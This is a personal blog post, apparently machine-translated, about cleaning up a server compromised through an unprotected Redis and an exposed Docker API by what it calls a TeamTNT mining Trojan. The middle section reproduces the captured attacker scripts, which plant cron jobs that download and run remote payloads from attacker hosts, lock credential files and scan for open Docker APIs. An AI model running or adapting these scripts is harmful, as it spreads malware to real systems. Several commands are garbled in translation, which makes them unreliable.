Today, WHEN I opened the server and tried to enter mysql in Docker to test sqlmode, I suddenly found that I could not enter mysql. Then I looked at mysql, and not only mysql, but all other applications also died.

Then I tried to restart it. It didn’t work. I opened the monitor and used the top command to check the process information, and found that the CPU usage was 100%, so I had the following content.

The CPU usage of KSWAPd0 is too high because of insufficient physical memory. Swap partition and memory page swap operation are used to exchange data, resulting in too high CPU usage. (Later, I realized that it was not KSWAPd0 at all, but a Trojan disguised as kSWAPd0 to fool me.)

2394 is the process that consumes the most CPU, so I kill 2349

CPU down…

But I also found that there is a process 9951 PNScan occupation is relatively high, the same rules, open baidu search

So I realized that the server was invaded by a virus. I immediately went to find an anti-virus solution and searched through the Internet. I probably knew it was invaded by Redis.

See the familiar 6379, confirm from Redis intrusion no doubt, remember my Redis only test use, so there is no password set.

Find the pnScan process, kill all processes, and delete the pnscan script in the /usr/local/bin directory

rm -rf  pnscan
Copy the code

When I was done, I thought it would be all right, but it still took up a lot of CPU

I found a lot of ways, but I still can’t solve it

I inadvertently used the netstat -ant command to check the network connection status

I don’t know until I check

2375, very familiar port, I opened it the day before yesterday to connect to the Docker deployment project remotely.

Suddenly I realized that there was more than one virus.

There is no danger in a hundred battles, so I went to find this blog Docker exposed port 2375 server attack solution!

Just use the following command to manipulate your Docker

docker -HTCP :// server IP:2375Docker commandCopy the code

The docker’s official website:

Warning: Changing the default docker daemon binding to a TCP port or Unix docker user group will increase your security risks by allowing non-root users to gain root access on the host. Make sure you control access to docker. If you are binding to a TCP port, anyone with access to that port has full Docker access; so it is not advisable on an open network.

Informed of a possible invasion.

Solution: FOR now, I’ve turned off port 2375 remote connection

I am by modifying the vim/lib/systemd/system/docker. Service

The image below is what I added. Delete it

Then perform

systemctl daemon-reload
Copy the code





Continue with the [scan] process

 ps -ef |grep scan
Copy the code

Enter/usr/share directory and found two suspicious program, why so clear?

Curiosity made me want to see what was written inside the shell

[scan] The captured part

#! /bin/bash
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
function SecureTheSystem(a){
SYSFILEARRAY=(pstree kill pkill htop netstat ss lsof  wget wge wdl curl cur cdl sysctl )
for SYSFILE in ${SYSFILEARRAY[@]}; do
SYSFILEBIN=`which $SYSFILE` 2>/dev/null 1>/dev/null
tntrecht -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chmod -x $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr +i $SYSFILEBIN 2>/dev/null 1>/dev/null
tntrecht +i $SYSFILEBIN 2>/dev/null 1>/dev/null
done
SYSTEMFILEARRAY=("/root/.ssh/" "/home/*/.ssh/" "/etc/passwd" "/etc/shadow" "/etc/sudoers" "/etc/ssh/" "/etc/ssh/sshd_config")
for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do
tntrecht +i -R $SYSTEMFILE  2>/dev/null 1>/dev/null
chattr +i -R $SYSTEMFILE  2>/dev/null 1>/dev/null
done
}
sleep 1
    if[-f "/bin/ps.original" ]
    then
        ps.original -fe|grep pnscan |grep -v grep
    else
        ps -fe|grep pnscan |grep -v grep
    fi
if [ $? -ne 0 ]
then
        rm -rf .dat .shard .ranges .lan 2>/dev/null
        sleep 1
        echo 'config set dbfilename "backup.db"' > .dat
        echo 'save' >> .dat
        echo 'config set stop-writes-on-bgsave-error no' >> .dat
        echo 'flushall' >> .dat
        echo 'set backup1 "\n\n\n*/2 * * * * cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
        echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
        echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
        echo 'set backup4 "\n\n\n*/5 * * * * wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
        echo 'config set dir "/var/spool/cron/"' >> .dat
        echo 'config set dbfilename "root"' >> .dat
        echo 'save' >> .dat
        echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
        echo 'save' >> .dat
        echo 'flushall' >> .dat
        echo 'set backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
        echo 'set backup2 "\n\n\n*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
        echo 'set backup3 "\n\n\n*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
        echo 'set backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
        echo 'config set dir "/etc/cron.d/"' >> .dat
        echo 'config set dbfilename "zzh"' >> .dat
        echo 'save' >> .dat
        echo 'config set dir "/etc/"' >> .dat
        echo 'config set dbfilename "crontab"' >> .dat
        echo 'save' >> .dat
        sleep 1
        pnx=pnscan
        [ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
        [ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
        while true; do


Copy the code

[MASS] Intercept part

#! /bin/bash
if[-f /bin/cd1]; then aabb=/bin/cd1echo "cd1 exist"
elif [ -f /bin/curl]; then aabb=/bin/curl
echo "curl exist"
else
echo "curl not exist,use yum reinstall"
yum -y remove curl&&yum -y install curl
fi

chmod +x /usr/bin/zgrab

dAPIpwn(){
range=The $1
port=$2
rate=$3
rndstr=$(head /dev/urandom | tr -dc a-z | head -c 6 ; echo ' ')
eval "$rndstr"="'$(masscan $range -p$port --rate=$rate | awk '{print $6}'| zgrab --senders 200 --port $port- HTTP = '/ v1.16 / version - the output - the file = 2 > / dev/null | grep - E' ApiVersion | client version 1.16 '| jq - r. IP)'";

for ipaddy in ${! rndstr}do

TARGET=$ipaddy:$port

echo '# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #'
$aabb -sLk http://107.3.150/input/da.php? vuln=$TARGET -o /dev/null
echo $TARGET

timeout -s SIGKILL 240 docker -H $TARGET run --rm -v /:/mnt alpine chroot /mnt/ /bin/sh -c "if ! type curl >/dev/null; then apt-get install -y curl; apt-get install -y --reinstall curl; yum clean all; yum install -y curl; yum reinstall -y curl; fi; echo \"* * * * * root curl http://107.189.3.150/b2f628/cronb.sh|bash\">/etc/crontab && echo \"* * * * * root curl http://107.189.3.150/b2f628/cronb.sh|bash\">/etc/cron.d/zzh"

done
}

Copy the code

My redis port 6379 and port 2375, port 2376 have been hacked

Since it has been backed up (later analysis, know yourself and know your enemy), then ruthless RM-RF

Then I top

Found that there is a process masscan, no matter how I kill or restart

So I looked at the scheduled task CD /var/spool/cron/ and found out why

Without further ado, after recording rm -RF root

Boy, did it start again

After some searching and searching, I found that the virus process is more than Masscan

Finally, I found a relevant article about this mining Trojan: Tencent security intercept TeamTNT mining Trojan’s latest variant, the compromised host is installed IRC backdoor, attackers can achieve any purpose

Docker Remote API unauthorized access vulnerability attack was used, SSH attack was used to spread, and IRC backdoor was installed. The use of Masscan and Zgrab for external scanning to occupy broadband as mentioned in the article can be reflected in the figure above.


Unload Massage, Zgrab next, but when I tried to unload, YUM was also destroyed

When I tried to change the contents of Yum, it told me that the file was read-only, and then I changed the permissions and found that I couldn’t change the permissions

Run ls -l yum

---xr-xr-x. 1 root root 801 11month5 2018 yum
Copy the code

Chattr -i yum chattr -i yum chattr -i yum chattr -i yum chattr -i yum chattr -i yum

Modify the Yum interpreter

I used find command to find masscan find-name masscan, found the executable file in bin directory, and directly deleted it

I’m going to cry, [mass] appears again, now I found a more suspicious process systemd-journal, search, dude, and systemd-journald is one letter short, this is definitely a Trojan horse process.

Tamping for a period of time, or can not be completely solved. Then I kill the process, it’s gone, and then I watch the process change. I watch it for a long time and it doesn’t appear [mass], but the Docker container is broken.

Finally I reset the server and replaced Debian.

Seems to be no trojans, but my environment has been destroyed, too bad, the system security is really important, I sometimes hear a friend (this is my friend) said that the database is black, extorted, systems are mining, in fact all of these can be avoided, in the later study work will be more focus on system safety, In the future, I will further study the vulnerability and virus and learn evasive solutions.

The reason why the server was invaded this time is mainly because Redis did not set the password and Docker did not carry out relevant verification after opening the remote API, and criminals used the program vulnerability to attack. Although it is just learning the environment, we still need to strengthen security treatment in the future.

Attached is ali Cloud vulnerability library link: Docker Daemon API unauthorized access Vulnerability

However, from another point of view, I think I have learned a lot of knowledge and increased experience, and re-building the environment can also consolidate my knowledge, welcome everyone to comment and leave valuable experience and suggestions.